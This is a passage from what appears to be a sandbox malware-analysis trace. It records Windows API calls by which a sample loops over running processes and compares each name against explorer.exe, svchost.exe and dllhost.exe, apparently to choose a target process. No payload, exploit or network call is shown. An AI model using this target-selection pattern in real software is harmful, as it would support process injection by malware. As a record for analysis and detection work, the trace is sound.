returned -1 [0247.019] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0247.019] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0247.019] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0247.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0247.020] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.020] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.020] CloseHandle (hObject=0xec) returned 1 [0247.020] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0247.020] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0247.020] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0247.020] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0247.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0247.021] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.021] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.021] CloseHandle (hObject=0xec) returned 1 [0247.021] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0247.021] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0247.021] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0247.021] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0247.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0247.021] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.021] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.021] CloseHandle (hObject=0xec) returned 1 [0247.022] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0247.022] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0247.022] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0247.022] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0247.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0247.022] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.022] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.022] CloseHandle (hObject=0xec) returned 1 [0247.022] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0247.022] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0247.022] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0247.022] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0247.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0247.023] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.023] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.023] CloseHandle (hObject=0xec) returned 1 [0247.023] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0247.023] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0247.023] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0247.023] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0247.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0247.023] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.023] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.024] CloseHandle (hObject=0xec) returned 1 [0247.024] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0247.024] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0247.024] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0247.024] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0247.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0247.024] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.024] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.024] CloseHandle (hObject=0xec) returned 1 [0247.024] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0247.024] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0247.024] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0247.024] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0247.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0247.025] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.025] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.025] CloseHandle (hObject=0xec) returned 1 [0247.025] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0247.025] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0247.025] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0247.025] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0247.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0247.026] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.026] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.026] CloseHandle (hObject=0xec) returned 1 [0247.026] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0247.026] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0247.026] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0247.026] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0247.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0247.026] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.026] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.026] CloseHandle (hObject=0xec) returned 1 [0247.026] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0247.026] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0247.026] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0247.026] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0247.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0247.027] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.027] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.027] CloseHandle (hObject=0xec) returned 1 [0247.027] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0247.027] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0247.027] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0247.027] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0247.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0247.028] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.028] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.028] CloseHandle (hObject=0xec) returned 1 [0247.028] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0247.028] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0247.028] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0247.028] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0247.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0247.028] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.028] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.028] CloseHandle (hObject=0xec) returned 1 [0247.028] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0247.028] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0247.028] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0247.029] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0247.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0247.029] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.029] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.029] CloseHandle (hObject=0xec) returned 1 [0247.029] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0247.029] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0247.029] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0247.029] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0247.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0247.030] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.030] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.030] CloseHandle (hObject=0xec) returned 1 [0247.030] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0247.030] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0247.030] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0247.030] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0247.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0247.030] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.030] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.031] CloseHandle (hObject=0xec) returned 1 [0247.031] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0247.031] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0247.031] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0247.031] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0247.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0247.031] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.031] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.031] CloseHandle (hObject=0xec) returned 1 [0247.031] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0247.031] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0247.031] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0247.031] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0247.032] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0247.033] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0247.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0247.033] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0247.034] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0247.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0247.034] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0247.035] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.035] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.035] CloseHandle (hObject=0xec) returned 1 [0247.035] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0247.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0247.035] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.035] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.035] CloseHandle (hObject=0xec) returned 1 [0247.035] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0247.036] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0247.036] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.036] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.036] CloseHandle (hObject=0xec) returned 1 [0247.037] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0247.037] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0247.037] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.037] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.037] CloseHandle (hObject=0xec) returned 1 [0247.037] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.038] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0247.038] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.038] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0247.038] CloseHandle (hObject=0xec) returned 1 [0247.038] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0247.039] CloseHandle (hObject=0xe8) returned 1 [0247.039] Sleep (dwMilliseconds=0x3e8) [0248.049] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0248.050] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0248.051] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0248.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0248.051] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0248.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0248.052] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0248.052] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0248.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0248.053] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0248.053] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0248.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0248.054] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0248.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0248.054] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0248.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0248.055] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, 